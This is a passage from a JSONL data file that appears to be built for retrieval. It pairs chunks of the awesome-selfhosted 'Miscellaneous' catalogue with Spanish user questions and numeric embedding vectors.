Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "necesito una plataforma para gestionar certificados y acceso privilegiado localmente, ΒΏquΓ© opciΓ³n existe?", "v": [0.09619, 0.20285, -0.15494, -0.16855, 0.12697, -0.1343, 0.06591, -0.1151, -0.25623, -0.13057, -0.02305, -0.0469, -0.02628, 0.06402, -0.00439, 0.00431, 0.05844, -0.06618, 0.00475, 0.01501, -0.08503, -0.06697, -0.07138, -0.08247, 0.02075, -0.09553, 0.11958, -0.07776, -0.11948, 0.06098, 0.03373, -0.01695, -0.07089, -0.0324, 0.06403, 0.01868, 0.04004, 0.15642, 0.01213, -0.03133, 0.03725, 0.09707, 0.03545, 0.03989, 0.09702, 0.00429, -0.07079, 0.01331, 0.0408, 0.05247, -0.00185, -0.08988, -0.18735, -0.05449, -0.01719, 0.08009, 0.11291, -0.01365, 0.09506, 0.03355, -0.14902, -0.0817, 0.08868, 0.00614, -0.03393, 0.04826, 0.07212, 0.1527, -0.06589, 0.1302, -0.04662, -0.05772, 0.05257, 0.02431, -0.0566, -0.00877, 0.06248, -0.00686, 0.01508, 0.0342, 0.12389, 0.0812, -0.00807, -0.03576, -0.08648, -0.05027, 0.01545, -0.01095, 4e-05, -0.05859, 0.03782, -0.01398, 0.06522, -0.13094, -0.02743, -0.05428, -0.01113, -0.02361, -0.06578, -0.02708, -0.02532, 0.086, -0.00372, 0.07374, 0.00581, 0.00547, 0.01903, -0.11492, -0.01584, -0.02461, -0.02631, 0.02964, -0.00333, 0.03726, -0.01565, 0.04888, 0.00895, -0.02739, -0.01546, 0.02376, -0.01611, -0.09058, 0.01235, -0.09482, 0.13849, 0.03987, -0.01161, 0.04188, -0.03839, 0.04646, -0.06919, -0.12593, 0.0267, -0.03173, -0.01405, -0.01656, 0.04129, -0.01468, -0.01084, -0.02573, -0.02473, -0.00671, -0.02403, -0.04884, 0.07071, -0.04353, -0.02801, -0.07014, -0.00294, 0.05287, -0.14616, -0.07739, -0.06284, 0.06026, -0.07709, -0.06431, 0.00151, -0.04038, -0.11516, 0.09175, -0.00634, -0.02824, -0.06854, 0.07689, 0.0238, 0.02142, -0.00484, 0.03376, -0.06001, -0.02511, 0.04207, 0.07038, 0.04829, -0.06518, 0.05812, -0.06795, 0.01868, -0.06081, 0.03969, 0.01497, 0.008, -0.03205, 0.04835, 0.05333, 0.05413, 0.05192, 0.02477, 0.01557, -0.0163, 0.09748, 0.0312, 0.01754, -0.02574, 0.02438, 0.02749, -0.01355, -0.03313, -0.0479, -0.00844, -0.04127, -0.0505, 0.01187, -0.01216, -0.01366, 0.01425, -0.01624, 0.03302, 0.00431, 0.01351, -0.02645, -0.0804, 0.01993, 0.05049, 0.00736, -0.03105, -0.02688, 0.00381, -0.0243, -0.00583, -0.09697, 0.01107, -0.02445, 0.03039, 0.07574, 0.07952, 0.00462, 0.0184, -0.00703, 0.01045, 0.02636, 0.06254, 0.00848, -0.01303, -0.00092, 0.03717, -0.05186, 0.02102, -0.02394, -0.03536, 0.01058, 0.01104, 0.10462, 0.03358, 0.00959, -0.03058, -0.00148, -0.08568, -0.03122, -0.05431, -0.06165, 0.00077, -0.02929, 0.00467, 0.029, -0.01426, 0.01125]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "hay alguna alternativa libre a YouTube que me permita bloquear los anuncios automΓ‘ticamente?", "v": [0.15989, 0.15937, -0.14252, -0.02434, -0.08638, 0.06315, -0.02067, -0.05713, -0.19228, -0.15349, -0.04346, -0.20137, 0.06852, 0.06093, 0.00539, -0.05354, -0.00041, -0.09271, 0.12909, -0.06008, 0.11939, -0.07461, -0.07358, -0.03836, -0.05068, -0.13922, -0.06995, 0.0473, -0.14195, -0.13035, -0.05215, 0.03882, 0.02308, 0.04243, -0.04834, 0.04831, 0.1178, 0.01288, 0.09654, -0.0413, 0.06522, -0.05117, -0.10394, 0.10496, -0.08478, 0.02515, 0.03047, 0.02028, -0.05094, -0.02713, 0.03244, -0.02927, -0.12408, 0.03309, 0.05527, 0.04982, 0.17878, 0.0033, -0.17022, -0.05404, -0.04274, -0.0696, 0.11865, 0.0328, 0.03546, 0.1758, 0.06787, 0.06758, 0.04148, 0.12368, -0.00723, -0.08939, 0.0347, 0.02453, 0.06763, 0.13459, -0.05991, 0.0116, -0.03298, 0.02295, 0.03151, -0.12324, 0.07383, 0.06896, 0.0021, -0.01095, -0.04757, -0.10075, -0.05932, -0.11286, 0.04217, 0.11871, 0.03656, 0.07747, 0.00154, -0.04352, 0.04817, 0.09509, -0.00856, -0.06754, 0.06652, -0.05029, -0.04682, 0.04479, 0.03498, 0.03926, 0.01821, -0.14032, -0.02408, 0.03786, 0.01495, 0.01115, -0.01085, -0.10754, -0.0174, 0.03823, -0.06116, -0.00804, 0.05413, -0.04841, -0.01042, -0.04085, -0.05065, -0.03059, 0.01022, 0.04885, -0.02069, 0.05413, -0.01758, 0.01747, 0.02131, -0.00974, -0.00164, -0.06833, -0.03281, 0.04049, 0.03738, 0.00926, -0.06406, -0.02286, 0.08499, -0.00069, 0.00136, -0.05753, 0.07373, -0.09293, -0.01317, -0.09954, -0.0724, 0.00184, -0.05419, -0.03436, -0.01629, 0.04199, 0.00533, 0.05643, -0.04535, -0.07391, 0.00211, 0.07823, 0.02583, -0.01769, -0.08031, 0.0312, -0.05123, 0.07888, -0.02549, 0.00988, -0.08925, 0.01161, -0.00782, 0.07866, 0.06003, -0.07361, -0.00418, -0.04739, 0.02202, 0.0232, 0.05752, -0.01408, -0.03207, 0.02027, -0.06913, -0.02255, -0.01831, -0.06373, -0.00779, -0.01541, 0.01685, 0.07665, -0.04397, 0.007, -0.0726, -0.03255, -0.00821, -0.01271, -0.06175, -0.05626, -0.00333, 0.01963, -0.03688, -0.03849, -0.00502, -0.01598, -0.08634, -0.01422, -0.00755, 0.02642, 0.00746, 0.01496, 0.03295, -0.05271, 0.01016, -0.02506, -0.01309, -0.00087, 0.07647, -0.02052, 0.01873, 0.00084, 0.05877, 0.05345, 0.02811, -0.00557, 0.00358, 0.06311, 0.04085, 0.0235, -3e-05, 0.04601, -0.05886, -0.02916, -0.04402, 0.01061, 0.04026, 0.01868, -0.00962, -0.03259, 0.00286, 0.01447, 0.01739, 0.02375, 0.00134, -0.00787, -0.02229, -0.06339, -0.03772, 0.02842, 0.00989, -0.08268, 0.01074, 0.05045, -0.00044, 0.01252, 0.04177, 0.02336]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "que programa hay para corregir errores en textos que sea gratuito?", "v": [-0.04381, 0.11413, -0.05453, -0.13583, 0.05619, -0.05119, -0.05181, -0.00821, -0.04238, -0.08161, -0.0948, -0.01474, -0.01812, -0.13029, 0.08738, -0.01908, 0.05354, -0.0193, 0.12892, -0.00324, 0.03521, -0.07903, -0.005, -0.09916, -0.07538, -0.04577, -0.03959, -0.07631, -0.03188, 0.01407, -0.01645, 0.0037, 0.15757, -0.10206, -0.06836, 0.08061, 0.06091, -0.0099, 0.0183, 0.04846, 0.15534, 0.07777, 0.01522, 0.02473, 0.04695, -0.11097, 0.07307, 0.04724, -0.0262, -0.00849, 0.09795, -0.01888, 0.08243, -0.02221, 0.0158, 0.02704, 0.10218, -0.14759, -0.09946, -0.11332, 0.02126, 0.09029, 0.01382, -0.04419, -0.01864, 0.0805, 0.05067, -0.05175, -0.11333, 0.14599, 0.11238, -0.02433, 0.07395, 0.03885, -0.08955, -0.00386, -0.08979, -0.08961, 0.03497, -0.01212, 0.01353, -0.04371, 0.02953, 0.03054, -0.06324, -0.008, 0.01035, -0.0557, -0.03184, -0.08804, 0.02771, 0.02506, 0.06979, 0.02408, -0.06647, -0.15244, 0.18784, -0.05451, 0.08079, 0.19594, 0.09212, -0.08561, -0.05609, 0.03842, -0.08088, 0.09912, 0.0283, 0.0076, -0.01373, -0.0111, -0.10826, -0.04415, -0.02865, -0.01287, -0.03128, -0.02828, 0.09259, 0.05046, 0.02258, -0.07085, -0.04644, -0.16041, -0.09618, -0.0143, 0.04648, 0.05208, 0.04587, 0.17125, -0.03543, 0.09332, -0.01345, 0.02878, -0.03271, -0.03549, -0.04387, -0.02101, 0.08986, -0.00958, -0.00253, 0.00762, -0.06356, 0.03264, -0.06041, 0.06808, -0.07058, 0.01834, 0.0131, -0.08776, -0.0593, -0.03382, -0.06146, 0.04686, 0.04558, 0.12028, -0.03179, -0.01678, 0.04096, -0.03735, -0.06976, -0.00873, -0.04623, -0.04445, 0.01192, 0.00528, 0.08926, -0.06734, -0.03198, 0.07493, 0.08327, 0.04976, -0.03965, 0.11066, 0.03892, -0.10301, 0.00489, 0.02698, -0.01638, -0.04039, 0.00157, -0.02143, -0.06322, -0.04911, -0.01214, 0.02664, -0.03037, -0.00195, -0.01995, 0.0444, 0.06329, -0.00658, -0.07333, -0.0154, -0.05843, -0.04815, -0.00963, 0.05228, -0.05992, 0.03439, 0.07156, -0.03871, -0.09759, -0.00724, -0.00515, 0.03006, 0.01112, 0.04343, -0.01454, 0.01435, 0.05468, 0.09208, -0.0036, -0.00641, 0.01869, -0.0508, -0.04816, 0.00625, 0.03942, 0.072, -0.00408, 0.04075, 0.02701, -0.055, 0.01964, 0.00112, -0.02164, -0.07288, 0.0404, 0.01829, 0.03037, 0.06944, 0.01016, -0.02175, -0.05191, -0.06817, 0.0356, 0.02194, 0.04685, 0.03382, 0.01547, -0.05411, 0.01861, 0.04772, 0.02033, -0.08586, 0.00785, 0.0107, -0.04353, -0.00293, 0.00933, 0.02839, -0.07888, 0.05139, 0.00882, -0.07915, 0.04075, -0.04552]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "con quΓ© puedo traducir automΓ‘ticamente desde el espaΓ±ol a otros idiomas sin pagar?", "v": [0.11524, 0.12734, -0.03954, 0.03878, 0.05676, -0.02043, 0.04392, -0.12959, -0.22983, 0.01369, -0.03039, -0.04634, 0.04892, -0.03224, 0.02561, 0.0355, 0.13521, 0.0107, 0.05725, -0.03781, 0.11932, -0.13845, -0.04497, -0.13507, -0.0277, -0.07937, -0.0157, -0.0356, -0.04499, 0.03447, -0.09133, 0.06288, 0.07204, -0.08956, -0.05112, 0.01231, 0.00502, 0.08644, 0.03772, -0.01163, 0.08892, -0.03407, 0.03707, 0.01284, -0.08912, 0.02153, 0.00525, -0.02245, 0.01606, -0.17432, 0.04295, -0.01383, -0.03085, -0.05903, -0.03432, -0.00514, 0.22792, -0.07017, -0.02738, -0.0902, 0.05297, 0.15503, 0.09948, 0.11789, 0.12527, -0.00454, 0.02069, 0.02888, 0.06438, -0.01884, -0.08133, 0.04728, -0.10891, 0.0916, -0.0473, 0.0187, -0.03871, -0.14953, 0.0976, 0.01679, 0.11351, -0.10495, 0.01552, 0.00353, 0.03351, -0.07068, 0.02042, -0.10294, 0.02601, -0.02738, -0.037, 0.0003, 0.00735, -0.09546, -0.04408, -0.00773, -0.00415, -0.07814, -0.02671, 0.00617, 0.04183, -0.06778, -0.00175, 0.07164, -0.066, 0.00454, 0.08305, -0.04639, 0.02598, 0.03926, 0.06586, 0.01858, -0.01982, -0.08953, -0.08005, -0.0088, 0.06124, 0.08103, 0.0079, 0.08158, -0.0813, -0.00423, 0.0625, 0.00816, 0.1051, -0.07016, 0.04898, 0.10057, 0.07325, 0.05549, -0.03193, -0.01768, 0.04616, -0.04865, -0.02503, 0.06955, 0.08262, -0.00252, -0.01313, -0.02441, -0.08282, 0.02786, -0.00732, 0.02264, 0.10803, -0.01937, 0.06654, -0.07741, -0.04793, -0.02296, -0.01414, -0.05214, 0.08256, 0.06151, -0.00719, -0.00946, 0.04207, 0.01185, -0.03227, 0.07426, 0.063, -0.04405, 0.02675, -0.00989, -0.059, 0.01276, -0.0942, -0.01769, 0.07864, -0.00218, 0.02991, -0.00567, 0.06552, -0.04958, -0.03165, 0.03204, 0.06007, -0.00927, 0.03927, -0.0513, -0.06956, -0.01981, -0.10301, -0.09154, -0.01639, -0.04011, 0.02705, 0.00537, -0.04346, 0.01178, 0.02794, 0.08382, -0.12364, -0.06021, -0.053, -0.06338, -0.08047, 0.0142, -0.00784, -0.07925, -0.11186, 0.02709, 0.04516, 0.00391, 0.00553, 0.07694, 0.0343, 0.07295, -0.03399, 0.10805, 0.00371, 0.01347, 0.03321, 0.00865, 0.00514, 0.02905, -0.05792, -0.04002, 0.00101, -0.05905, 0.02306, -0.00271, 0.03924, -0.02964, 0.00477, -0.0157, 0.01319, 0.06174, 0.03076, 0.09452, -0.07454, 0.07372, 0.01384, -0.03959, 0.0681, -0.00997, -0.03198, 0.05885, -0.05966, -0.02308, -0.0416, 0.02182, -0.00273, -0.05112, -0.07288, -0.05271, -0.0182, -0.01926, 0.01466, -0.06529, 0.01187, 0.11731, 0.02591, -0.04947, 0.02134, -0.00255]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre y sencilla para proteger mi web contra el spam?", "v": [-0.0555, 0.03429, -0.1693, -0.05416, -0.19703, -0.11316, -0.05562, -0.09795, -0.13483, -0.02299, -0.02537, -0.08206, 0.08186, -0.08941, 0.05437, -0.0133, 0.00672, -0.05768, 0.12831, 0.0445, -0.03169, -0.06003, -0.06018, -0.1159, -0.06035, -0.02623, 0.02146, 0.10983, -0.11618, -0.02587, -0.00252, -0.01213, 0.04219, 0.04997, -0.03477, 0.14991, 0.14015, 0.05102, 0.11249, 0.06092, 0.10177, -0.13077, -0.02517, 0.0861, -0.10743, -0.00496, -0.08205, -0.05168, 0.02149, 0.04022, -0.17729, -0.00944, -0.13406, -0.13688, -0.03239, 0.02121, 0.04051, -0.15863, -0.02065, -0.04839, -0.07031, 0.11955, 0.04542, 0.03427, 0.02263, -0.10017, -0.09328, -0.01267, -0.10745, 0.11454, 0.14864, -0.06444, 0.06262, -0.04665, -0.021, 0.01161, -0.05937, 0.00044, -0.06792, 0.06044, 0.04919, -0.07423, -0.00088, 0.0407, -0.02921, -0.08908, -0.04764, -0.0892, -0.0768, -0.00205, 0.05618, 0.07668, -0.02909, 0.05669, -0.05392, -0.12962, 0.01546, -0.02939, -0.04679, 0.03674, -0.00203, -0.05135, -0.10989, 0.02981, 0.05164, -0.06781, -0.07468, 0.04083, -0.06939, 0.00138, -0.07422, -0.01928, -0.06101, -0.01657, 0.06106, -0.07581, -0.06572, -0.00335, 0.09037, -0.03791, 0.00027, -0.03988, -0.10623, 0.0049, 0.09694, 0.0481, 0.00024, 0.03742, -0.09001, -0.03975, -0.00565, -0.09043, -0.08632, -0.06884, -0.07559, 0.03739, -0.05958, -0.07615, -0.02324, 0.06367, 0.05109, 0.10657, -0.06079, 0.02385, -0.0172, -0.03631, 0.03526, -0.03073, -0.0405, -0.03425, -0.04892, -0.0591, 0.02446, 0.0766, -0.02398, 0.06341, -0.04882, -0.06183, 0.00374, 0.08498, 0.00087, -0.00038, 0.04978, 0.05901, 0.0383, 0.04558, 0.0038, -0.0213, -0.03259, -0.03492, 0.04063, 0.11511, 0.04274, -0.13517, 0.00939, -0.0357, 0.00276, -0.01534, 0.04933, -0.08835, 0.02697, 0.00211, -0.08451, 0.0514, -0.01925, 0.00628, 0.03077, 0.03313, 0.00385, 0.03766, 0.00662, -0.00552, -0.06093, -0.01966, -0.03086, -0.00072, -0.03642, -0.13345, -0.01148, -0.01477, -0.03796, -0.09198, 0.01497, 0.00944, -0.06236, 0.04181, 0.01379, -0.05709, -0.01516, 0.02153, 0.07818, 0.05346, 0.0509, -0.01764, -0.07193, -0.00606, 0.05407, 0.04418, 0.00078, 0.01507, 0.03647, 0.04373, -0.02128, -0.01117, -0.02778, 0.0041, -0.01006, 0.03268, -0.03055, -0.0087, -0.03964, -0.016, -0.00306, 0.05108, 0.00705, -0.01143, -0.00692, -0.01236, -0.01529, 0.01435, 0.01212, 0.05047, 0.00673, -0.04149, 0.00508, -0.01461, -0.09359, 0.03246, -0.05407, -0.03571, -0.04217, 0.00702, 0.00937, 0.00207, -0.00672, 0.00206]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "que programa sirve para convertir documentos a audio", "v": [0.0094, 0.08583, -0.11486, -0.23173, 0.08268, -0.14486, 0.03409, -0.1069, -0.06413, -0.10708, -0.11637, -0.11437, 0.00675, -0.153, -0.01761, -0.05974, 0.16734, -0.11489, 0.0471, 0.04478, 0.11669, 0.02781, -0.02804, -0.08324, -0.02294, 0.036, 0.04493, -0.05738, -0.00213, 0.01046, 0.03453, 0.00283, 0.04591, -0.12336, -0.09204, -0.00055, 0.00997, 0.05565, -0.06272, 0.12898, 0.07095, 0.02269, -0.02935, 0.10754, -0.05548, 0.01757, 0.0403, 0.09279, -0.05632, -0.00822, 0.01872, -0.03109, -0.03598, 0.06196, -0.0187, -0.14446, -0.01571, -0.19313, -0.05501, -0.07072, -0.02973, -0.02287, 0.01581, -0.07866, 0.05999, 0.0633, 0.08117, -0.01104, -0.02474, -0.0111, -0.14822, 0.04239, 0.13586, -0.00947, -0.06597, -0.04513, -0.06578, -0.09751, -0.02824, -0.01266, 0.05556, -0.04148, -0.01318, 0.005, -0.08727, 0.01949, 0.05528, 0.00701, 0.09293, 0.00256, -0.04103, 0.08796, 0.08392, 0.02796, 0.09602, -0.07927, 0.11303, 0.00902, -0.00718, -0.00961, 0.02507, 0.03109, -0.07346, 0.02684, -0.05644, 0.09388, 0.00464, -0.08981, -0.01985, 0.1183, -0.03228, 0.08003, -0.01631, 0.06501, -0.05564, -0.02065, 0.06424, -0.04755, 0.03019, -0.01707, -0.06692, 0.06509, -0.08471, 0.04856, -0.01186, -0.0307, 0.00579, 0.02946, -0.01838, 0.10066, 0.08038, -0.01411, -0.03923, -0.04815, -0.03032, -0.14723, 0.0317, -0.04881, -0.01287, -0.03651, 0.02507, 0.03351, -0.02478, 0.02265, 0.0151, -0.03206, 0.0497, -0.00331, 0.01658, -0.06339, -0.01492, -0.03887, -0.04667, -0.00299, -0.07662, -0.01305, 0.05924, -0.04092, -0.12235, 0.01555, -0.01899, 0.00703, 0.01112, -0.02171, 0.07094, -0.07579, -0.02048, 0.0598, 0.10599, 0.0116, -0.02088, -0.04757, 0.09142, -0.12531, -0.04016, -0.01596, -0.03171, -0.03813, 0.1028, -0.02521, -0.11321, 0.06776, 0.05162, 0.01469, -0.01834, -0.00731, -0.00247, -0.0689, -0.02498, -0.07004, -0.06299, 0.02854, -0.03151, -0.02216, 0.03194, -0.03549, -0.07149, -0.0342, -0.03796, -0.02784, -0.06674, -0.01934, -0.01065, -0.02463, 0.07543, 0.12801, -0.0217, -0.01685, 0.04985, 0.1072, -0.03582, -0.0369, 0.02031, 0.05446, -0.0626, -0.02157, -0.03508, 0.08018, 0.03643, 0.05182, 0.05242, -0.0361, 0.04949, -0.00985, 0.05401, -0.07998, 0.06481, 0.01088, 0.00302, -0.01735, 0.00375, 0.00045, 0.01782, 0.00742, -0.03055, 0.02729, -0.06136, -0.01061, -0.04771, -0.09537, -0.01131, 0.06484, -0.04751, -0.0311, -0.02342, 0.0284, -0.0041, -0.00137, 0.08764, -0.00771, -0.0167, 0.06314, 0.07619, -0.01561, 0.04571, -0.03447]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "con que puedo generar presentaciones bonitas en la nube sin instalar nada", "v": [0.10059, 0.07578, -0.23366, -0.0408, 0.09425, -0.00483, -0.10167, -0.037, -0.21565, -0.12458, -0.05867, -0.08532, -0.07172, -0.00722, -0.137, 0.05461, -0.01466, -0.13146, 0.06229, 0.07528, -0.01775, 0.0046, -0.04417, -0.07139, -0.02143, 0.00856, 0.08448, 0.05207, 0.00495, -0.03624, 0.00955, -0.05429, 0.03885, -0.03533, 0.03105, -0.06139, -0.09849, -0.03495, -0.08633, -0.04479, -0.02122, 0.0774, 0.00709, 0.16133, 0.01116, -0.16301, -0.04963, -0.06413, -0.02295, -0.00617, -0.05207, 0.01574, -0.03684, -0.01878, -0.00787, -0.14674, 0.08967, -0.13343, 0.05351, -0.04438, -0.08502, 0.22455, 0.03421, -0.07553, 0.05457, 0.03256, -0.04233, 0.07883, -0.07195, 0.02746, -0.00331, 0.02316, 0.03638, -0.07944, 0.05415, 0.14265, -0.08162, -0.01911, -0.02661, 0.13019, 0.02315, 0.05347, -0.00354, 0.03508, -0.11179, -0.04971, 0.00727, -0.05277, -0.00603, -0.03417, -0.02723, -0.04258, 0.08776, 0.06641, 0.04898, -0.02412, 0.09648, 0.07583, -0.04337, 0.02687, -0.02754, 0.07243, 0.00795, 0.049, -0.052, 0.03052, 0.12189, -0.11276, 0.02212, -0.0065, -0.00725, -0.01657, -0.01685, -0.01576, -0.00403, -0.05098, 0.08765, -0.13891, -0.04996, 0.05912, -0.03703, -0.0752, 0.02186, 0.02104, -0.041, -0.03808, -0.05919, 0.04692, -0.09285, 0.07825, -0.02394, -0.02456, 0.04494, -0.00396, -0.02865, -0.03652, -0.09733, -0.12409, 0.01288, -0.02974, 0.06857, 0.07207, 0.04749, -0.01715, 0.00377, 0.00098, -0.00898, 0.0196, -0.01882, -0.05484, 0.06785, -0.01211, -0.07018, 0.06955, -0.08799, 0.03822, 0.05833, 0.00385, 0.00779, -0.02682, 0.09582, 0.08049, -0.08406, -0.00484, 0.03379, 0.03637, -0.09165, 0.01896, 0.07164, 0.06128, -0.04759, 0.06199, -0.02334, -0.0912, 0.06753, -0.01171, 0.02205, -0.07069, 0.02516, -0.02167, -0.03584, -0.02356, -0.04307, 0.04618, -0.04471, -0.05075, -0.08054, -0.01533, -0.00247, 0.0629, 0.03855, -0.00753, -0.07701, -0.01482, 0.04794, -0.06325, -0.04344, -0.08682, -0.04301, 0.0188, -0.04435, 0.0385, -0.08276, -0.00742, 0.06442, 0.02346, -0.05615, 0.08459, -0.00298, 0.04618, 0.04735, -0.00318, -0.07264, -0.07738, 0.03205, -0.02674, 0.01913, -0.02842, -0.00151, 0.02505, -0.0005, -0.01442, 0.06264, -0.06156, 0.01645, 0.00425, -0.00988, 0.06032, 0.00646, 0.02135, -0.06377, 0.01846, -5e-05, -0.05055, 0.01074, 0.03634, 0.0314, 0.00147, -0.02441, -0.02363, -0.01632, 0.06545, 0.03428, -0.05583, -0.07627, -0.05647, -0.08243, 0.04769, 2e-05, -0.0334, -0.00905, 0.09023, 0.06545, -0.04266, 0.01469, -0.00225]} -{"tipo": 